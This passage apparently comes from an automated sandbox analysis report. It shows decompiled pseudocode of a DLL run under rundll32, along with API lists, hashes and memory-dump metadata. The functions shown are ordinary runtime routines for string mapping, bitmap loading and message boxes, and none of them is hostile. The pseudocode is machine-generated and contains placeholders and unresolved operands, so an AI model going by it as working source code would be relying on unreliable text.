                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t199 =  *0x1004f73c; // 0x1
                                                                                                            				if(_t199 == 0) {
                                                                                                            					_t185 = 1;
                                                                                                            					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
                                                                                                            						_t169 = GetLastError();
                                                                                                            						__eflags = _t169 - 0x78;
                                                                                                            						if(_t169 == 0x78) {
                                                                                                            							 *0x1004f73c = 2;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *0x1004f73c = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *(_t192 + 0x14) <= 0) {
                                                                                                            					L11:
                                                                                                            					_t119 =  *0x1004f73c; // 0x1
                                                                                                            					if(_t119 == 2 || _t119 == 0) {
                                                                                                            						 *(_t192 - 0x28) = 0;
                                                                                                            						_t183 = 0;
                                                                                                            						 *(_t192 - 0x3c) = 0;
                                                                                                            						__eflags =  *(_t192 + 8);
                                                                                                            						if( *(_t192 + 8) == 0) {
                                                                                                            							_t138 =  *0x1004f724; // 0x0
                                                                                                            							 *(_t192 + 8) = _t138;
                                                                                                            						}
                                                                                                            						__eflags =  *(_t192 + 0x20);
                                                                                                            						if( *(_t192 + 0x20) == 0) {
                                                                                                            							_t137 =  *0x1004f734; // 0x0
                                                                                                            							 *(_t192 + 0x20) = _t137;
                                                                                                            						}
                                                                                                            						_t120 = E1001A444(0,  *(_t192 + 8));
                                                                                                            						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
                                                                                                            						__eflags = _t120 - 0xffffffff;
                                                                                                            						if(_t120 != 0xffffffff) {
                                                                                                            							__eflags = _t120 -  *(_t192 + 0x20);
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                                                            								L61:
                                                                                                            								__eflags =  *(_t192 - 0x28);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push( *(_t192 - 0x28));
                                                                                                            									E100107C8(0, _t183, _t186, __eflags);
                                                                                                            								}
                                                                                                            								_t122 = _t186;
                                                                                                            								goto L64;
                                                                                                            							}
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_t175 = _t192 + 0x14;
                                                                                                            							_push(_t192 + 0x14);
                                                                                                            							_push( *(_t192 + 0x10));
                                                                                                            							_push(_t120);
                                                                                                            							_push( *(_t192 + 0x20));
                                                                                                            							_t125 = E1001A487(0, _t183, _t185, __eflags);
                                                                                                            							_t195 =  &(_t193[0xc]);
                                                                                                            							 *(_t192 - 0x28) = _t125;
                                                                                                            							__eflags = _t125;
                                                                                                            							if(_t125 == 0) {
                                                                                                            								goto L46;
                                                                                                            							}
                                                                                                            							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
                                                                                                            							 *(_t192 - 0x24) = _t187;
                                                                                                            							__eflags = _t187;
                                                                                                            							if(_t187 == 0) {
                                                                                                            								_t186 =  *(_t192 - 0x48);
                                                                                                            								L58:
                                                                                                            								__eflags =  *(_t192 - 0x3c);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t183);
                                                                                                            									E100107C8(0, _t183, _t186, __eflags);
                                                                                                            								}
                                                                                                            								goto L61;
                                                                                                            							}
                                                                                                            							 *(_t192 - 4) = 0;
                                                                                                            							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
                                                                                                            							 *(_t192 - 0x18) = _t195;
                                                                                                            							_t183 = _t195;
                                                                                                            							 *(_t192 - 0x44) = _t183;
                                                                                                            							E10011C50(_t183, 0, _t187);
                                                                                                            							_t196 =  &(_t195[0xc]);
                                                                                                            							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t183;
                                                                                                            							if(_t183 != 0) {
                                                                                                            								L54:
                                                                                                            								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
                                                                                                            								 *(_t192 - 0x24) = _t132;
                                                                                                            								__eflags = _t132;
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push( *(_t192 + 0x1c));
                                                                                                            									_push( *(_t192 + 0x18));
                                                                                                            									_push(_t192 - 0x24);
                                                                                                            									_push(_t183);
                                                                                                            									_push( *(_t192 + 0x20));
                                                                                                            									_push( *((intOrPtr*)(_t192 - 0x40)));
                                                                                                            									_t134 = E1001A487(0, _t183, _t187, __eflags);
                                                                                                            									asm("sbb esi, esi");
                                                                                                            									_t186 =  ~( ~_t134);
                                                                                                            									goto L58;
                                                                                                            								}
                                                                                                            								goto L55;
                                                                                                            							} else {
                                                                                                            								_t183 = E100107B6( *(_t192 - 0x24));
                                                                                                            								__eflags = _t183;
                                                                                                            								if(_t183 == 0) {
                                                                                                            									L55:
                                                                                                            									_t186 = 0;
                                                                                                            									goto L58;
                                                                                                            								}
                                                                                                            								E10011C50(_t183, 0,  *(_t192 - 0x24));
                                                                                                            								_t196 =  &(_t196[0xc]);
                                                                                                            								 *(_t192 - 0x3c) = 1;
                                                                                                            								goto L54;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							goto L46;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(_t119 != 1) {
                                                                                                            							L46:
                                                                                                            							_t122 = 0;
                                                                                                            							L64:
                                                                                                            							return E1001254F(_t122);
                                                                                                            						}
                                                                                                            						_t184 = 0;
                                                                                                            						 *(_t192 - 0x2c) = 0;
                                                                                                            						 *(_t192 - 0x38) = 0;
                                                                                                            						 *(_t192 - 0x34) = 0;
                                                                                                            						if( *(_t192 + 0x20) == 0) {
                                                                                                            							_t164 =  *0x1004f734; // 0x0
                                                                                                            							 *(_t192 + 0x20) = _t164;
                                                                                                            						}
                                                                                                            						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
                                                                                                            						 *(_t192 - 0x30) = _t190;
                                                                                                            						if(_t190 == 0) {
                                                                                                            							goto L46;
                                                                                                            						} else {
                                                                                                            							 *(_t192 - 4) = 1;
                                                                                                            							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
                                                                                                            							 *(_t192 - 0x18) = _t193;
                                                                                                            							 *(_t192 - 0x1c) = _t193;
                                                                                                            							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                                                            							if( *(_t192 - 0x1c) != 0) {
                                                                                                            								L21:
                                                                                                            								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
                                                                                                            									L36:
                                                                                                            									_t219 =  *(_t192 - 0x34);
                                                                                                            									if( *(_t192 - 0x34) != 0) {
                                                                                                            										_push( *(_t192 - 0x20));
                                                                                                            										E100107C8(0, _t184, _t190, _t219);
                                                                                                            									}
                                                                                                            									_t220 =  *(_t192 - 0x38);
                                                                                                            									if( *(_t192 - 0x38) != 0) {
                                                                                                            										_push( *(_t192 - 0x1c));
                                                                                                            										E100107C8(0, _t184, _t190, _t220);
                                                                                                            									}
                                                                                                            									_t122 = _t184;
                                                                                                            									goto L64;
                                                                                                            								}
                                                                                                            								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
                                                                                                            								 *(_t192 - 0x2c) = _t184;
                                                                                                            								if(_t184 == 0) {
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
                                                                                                            									 *(_t192 - 4) = 2;
                                                                                                            									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
                                                                                                            									 *(_t192 - 0x18) = _t193;
                                                                                                            									 *(_t192 - 0x20) = _t193;
                                                                                                            									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                                                            									__eflags =  *(_t192 - 0x20);
                                                                                                            									if( *(_t192 - 0x20) != 0) {
                                                                                                            										L31:
                                                                                                            										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
                                                                                                            										if(__eflags != 0) {
                                                                                                            											_push(0);
                                                                                                            											_push(0);
                                                                                                            											__eflags =  *(_t192 + 0x1c);
                                                                                                            											if(__eflags != 0) {
                                                                                                            												_push( *(_t192 + 0x1c));
                                                                                                            												_push( *(_t192 + 0x18));
                                                                                                            											} else {
                                                                                                            												_push(0);
                                                                                                            												_push(0);
                                                                                                            											}
                                                                                                            											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
                                                                                                            										}
                                                                                                            										goto L36;
                                                                                                            									} else {
                                                                                                            										_t160 = E100107B6(_t184 + _t184);
                                                                                                            										 *(_t192 - 0x20) = _t160;
                                                                                                            										__eflags = _t160;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											goto L36;
                                                                                                            										}
                                                                                                            										 *(_t192 - 0x34) = 1;
                                                                                                            										goto L31;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
                                                                                                            									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                                                            								}
                                                                                                            								goto L36;
                                                                                                            							} else {
                                                                                                            								_t163 = E100107B6(_t190 + _t190);
                                                                                                            								_pop(_t172);
                                                                                                            								 *(_t192 - 0x1c) = _t163;
                                                                                                            								if(_t163 == 0) {
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            								 *(_t192 - 0x38) = 1;
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t181 =  *(_t192 + 0x14);
                                                                                                            				_t165 =  *(_t192 + 0x10);
                                                                                                            				while(1) {
                                                                                                            					_t172 = _t181 - 1;
                                                                                                            					if( *_t165 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t165 = _t165 + 1;
                                                                                                            					if(_t172 != 0) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					_t172 = _t172 | 0xffffffff;
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
                                                                                                            				goto L11;
                                                                                                            			}




























                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181f3
                                                                                                            0x10018222
                                                                                                            0x10018232
                                                                                                            0x10018237
                                                                                                            0x1001823c
                                                                                                            0x1001823f
                                                                                                            0x10018260
                                                                                                            0x10018263
                                                                                                            0x1001827d
                                                                                                            0x10018291
                                                                                                            0x10018293
                                                                                                            0x10018295
                                                                                                            0x10018296
                                                                                                            0x10018297
                                                                                                            0x1001829a
                                                                                                            0x100182a0
                                                                                                            0x100182a3
                                                                                                            0x1001829c
                                                                                                            0x1001829c
                                                                                                            0x1001829d
                                                                                                            0x1001829d
                                                                                                            0x100182b4
                                                                                                            0x100182b4
                                                                                                            0x00000000
                                                                                                            0x10018265
                                                                                                            0x10018269
                                                                                                            0x1001826f
                                                                                                            0x10018272
                                                                                                            0x10018274
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x10018263
                                                                                                            0x100181f8
                                                                                                            0x10018217
                                                                                                            0x10018217
                                                                                                            0x00000000
                                                                                                            0x10018197
                                                                                                            0x1001819b
                                                                                                            0x100181a0
                                                                                                            0x100181a1
                                                                                                            0x100181a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x10018195
                                                                                                            0x1001814e
                                                                                                            0x100180f7
                                                                                                            0x100180d4
                                                                                                            0x100180d7
                                                                                                            0x100180da
                                                                                                            0x100180da
                                                                                                            0x100180dd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180df
                                                                                                            0x100180e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x100180ec
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                                                            • GetLastError.KERNEL32 ref: 100180BA
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1775797328-4125583295
                                                                                                            • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                                                            • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t53;
                                                                                                            				void* _t54;
                                                                                                            				signed int _t56;
                                                                                                            				struct HDC__* _t65;
                                                                                                            				struct HBITMAP__* _t66;
                                                                                                            				struct HDC__* _t70;
                                                                                                            				void* _t78;
                                                                                                            				int* _t80;
                                                                                                            				int _t81;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t89;
                                                                                                            				void* _t102;
                                                                                                            				struct HDC__* _t103;
                                                                                                            				BITMAPINFO* _t105;
                                                                                                            
                                                                                                            				_t53 = LoadResource(_a4, _a8);
                                                                                                            				_v20 = _t53;
                                                                                                            				if(_t53 == 0) {
                                                                                                            					return _t53;
                                                                                                            				}
                                                                                                            				_t54 = LockResource(_t53);
                                                                                                            				_t78 = _t54;
                                                                                                            				_v12 = _t78;
                                                                                                            				if(_t78 == 0) {
                                                                                                            					L17:
                                                                                                            					return _t54;
                                                                                                            				}
                                                                                                            				_t99 =  *_t78 + 0x40;
                                                                                                            				_t54 = E100107B6( *_t78 + 0x40);
                                                                                                            				_t105 = _t54;
                                                                                                            				if(_t105 == 0) {
                                                                                                            					L16:
                                                                                                            					goto L17;
                                                                                                            				} else {
                                                                                                            					E10011440(_t105, _t78, _t99);
                                                                                                            					_t102 = _t105 + _t105->bmiHeader;
                                                                                                            					_a8 = _a8 & 0x00000000;
                                                                                                            					do {
                                                                                                            						_t84 =  *(_t102 + _a8 * 4);
                                                                                                            						_t56 = 0;
                                                                                                            						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
                                                                                                            							_t56 = _t56 + 1;
                                                                                                            							if(_t56 < 4) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						__eflags = _a12;
                                                                                                            						if(_a12 == 0) {
                                                                                                            							_t80 = 0x1003f064 + _t56 * 8;
                                                                                                            							_v8 = _t80;
                                                                                                            							_a4 = GetSysColor( *_t80) & 0x000000ff;
                                                                                                            							_a4 = GetSysColor( *_t80) << 8;
                                                                                                            							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
                                                                                                            							__eflags = _t89;
                                                                                                            							 *(_t102 + _a8 * 4) = _t89;
                                                                                                            						} else {
                                                                                                            							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								 *(_t102 + _a8 * 4) = 0xffffff;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L12:
                                                                                                            						_a8 = _a8 + 1;
                                                                                                            					} while (_a8 < 0x10);
                                                                                                            					_t103 = _t105->bmiHeader.biWidth;
                                                                                                            					_t81 = _t105->bmiHeader.biHeight;
                                                                                                            					_a4 = _t103;
                                                                                                            					_a8 = _t81;
                                                                                                            					_t65 = GetDC(0);
                                                                                                            					_a12 = _t65;
                                                                                                            					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
                                                                                                            					_v8 = _t66;
                                                                                                            					if(_t66 != 0) {
                                                                                                            						_t70 = CreateCompatibleDC(_a12);
                                                                                                            						_t81 = SelectObject;
                                                                                                            						_t103 = _t70;
                                                                                                            						_v16 = SelectObject(_t103, _v8);
                                                                                                            						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
                                                                                                            						SelectObject(_t103, _v16);
                                                                                                            						DeleteDC(_t103);
                                                                                                            					}
                                                                                                            					ReleaseDC(0, _a12);
                                                                                                            					_push(_t105);
                                                                                                            					E100107C8(_t81, _t103, _t105, 0);
                                                                                                            					FreeResource(_v20);
                                                                                                            					_t54 = _v8;
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x1002b66f
                                                                                                            0x1002b66f
                                                                                                            0x1002b672
                                                                                                            0x1002b67c
                                                                                                            0x1002b67f
                                                                                                            0x1002b684
                                                                                                            0x1002b687
                                                                                                            0x1002b68a
                                                                                                            0x1002b693
                                                                                                            0x1002b696
                                                                                                            0x1002b69e
                                                                                                            0x1002b6a1
                                                                                                            0x1002b6a6
                                                                                                            0x1002b6af
                                                                                                            0x1002b6b5
                                                                                                            0x1002b6ca
                                                                                                            0x1002b6e7
                                                                                                            0x1002b6f1
                                                                                                            0x1002b6f4
                                                                                                            0x1002b6f4
                                                                                                            0x1002b6ff
                                                                                                            0x1002b705
                                                                                                            0x1002b706
                                                                                                            0x1002b70f
                                                                                                            0x1002b715
                                                                                                            0x00000000
                                                                                                            0x1002b715

                                                                                                            APIs
                                                                                                            • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B635
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B643
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B658
                                                                                                            • GetDC.USER32(00000000), ref: 1002B68A
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                                                            • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                                                            • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                                                            • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                                                            • ReleaseDC.USER32 ref: 1002B6FF
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                                                            • String ID:
                                                                                                            • API String ID: 2552574679-0
                                                                                                            • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                                                            • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
                                                                                                            				char _v8;
                                                                                                            				signed char _v12;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr* _t13;
                                                                                                            				intOrPtr* _t14;
                                                                                                            				intOrPtr* _t17;
                                                                                                            				void* _t19;
                                                                                                            				_Unknown_base(*)()* _t23;
                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                            				void* _t28;
                                                                                                            				struct HINSTANCE__* _t31;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t28 = 0;
                                                                                                            				_t33 =  *0x1004f824 - _t28; // 0x0
                                                                                                            				if(_t33 != 0) {
                                                                                                            					L6:
                                                                                                            					_t13 =  *0x1004f830; // 0x0
                                                                                                            					if(_t13 == 0) {
                                                                                                            						L14:
                                                                                                            						_t14 =  *0x1004f828; // 0x0
                                                                                                            						if(_t14 != 0) {
                                                                                                            							_t28 =  *_t14();
                                                                                                            							if(_t28 != 0) {
                                                                                                            								_t17 =  *0x1004f82c; // 0x0
                                                                                                            								if(_t17 != 0) {
                                                                                                            									_t28 =  *_t17(_t28);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L18:
                                                                                                            						return  *0x1004f824(_t28, _a4, _a8, _a12);
                                                                                                            					}
                                                                                                            					_t19 =  *_t13();
                                                                                                            					if(_t19 == 0) {
                                                                                                            						L10:
                                                                                                            						if( *0x1004f3ec < 4) {
                                                                                                            							_a14 = _a14 | 0x00000004;
                                                                                                            						} else {
                                                                                                            							_a14 = _a14 | 0x00000020;
                                                                                                            						}
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					_push( &_v8);
                                                                                                            					_push(0xc);
                                                                                                            					_push( &_v20);
                                                                                                            					_push(1);
                                                                                                            					_push(_t19);
                                                                                                            					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t31 = LoadLibraryA("user32.dll");
                                                                                                            				if(_t31 == 0) {
                                                                                                            					L12:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t23 = GetProcAddress(_t31, "MessageBoxA");
                                                                                                            				 *0x1004f824 = _t23;
                                                                                                            				if(_t23 == 0) {
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
                                                                                                            					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
                                                                                                            					if( *0x1004f3e0 == 2) {
                                                                                                            						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
                                                                                                            						 *0x1004f834 = _t26;
                                                                                                            						if(_t26 != 0) {
                                                                                                            							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                            • API String ID: 2238633743-1612076079
                                                                                                            • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                                                            • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 48%
                                                                                                            			E10039B26(intOrPtr __ecx) {
                                                                                                            				signed int __ebx;
                                                                                                            				signed int __edi;
                                                                                                            				CHAR* __esi;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t164;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				signed int _t172;
                                                                                                            				signed int _t174;
                                                                                                            				signed int _t178;
                                                                                                            				void* _t192;
                                                                                                            				signed short _t203;
                                                                                                            				signed int _t204;
                                                                                                            				signed int _t205;
                                                                                                            				signed int* _t207;
                                                                                                            				signed int _t209;
                                                                                                            				void* _t213;
                                                                                                            				signed int _t214;
                                                                                                            				signed int _t217;
                                                                                                            				signed short* _t224;
                                                                                                            				void* _t233;
                                                                                                            				CHAR* _t235;
                                                                                                            				signed int _t236;
                                                                                                            				intOrPtr* _t237;
                                                                                                            				void* _t238;
                                                                                                            				void* _t239;
                                                                                                            				signed short _t242;
                                                                                                            				signed int _t243;
                                                                                                            				intOrPtr _t244;
                                                                                                            				signed short* _t245;
                                                                                                            				signed int** _t246;
                                                                                                            				void* _t247;
                                                                                                            				void* _t249;
                                                                                                            				void* _t250;
                                                                                                            				void* _t253;
                                                                                                            				void* _t263;
                                                                                                            
                                                                                                            				E10011BF0(0x1003b377, _t247);
                                                                                                            				_t250 = _t249 - 0x60;
                                                                                                            				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
                                                                                                            				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
                                                                                                            				_t214 = 0;
                                                                                                            				 *(_t247 - 0x20) = _t161;
                                                                                                            				if( *((intOrPtr*)(__ecx)) != 0) {
                                                                                                            					E10011C50(_t247 - 0x4c, 0, 0x10);
                                                                                                            					_t235 =  *(_t247 + 0x18);
                                                                                                            					_t253 = _t250 + 0xc;
                                                                                                            					if(_t235 == 0) {
                                                                                                            						_t164 =  *(_t247 - 0x44);
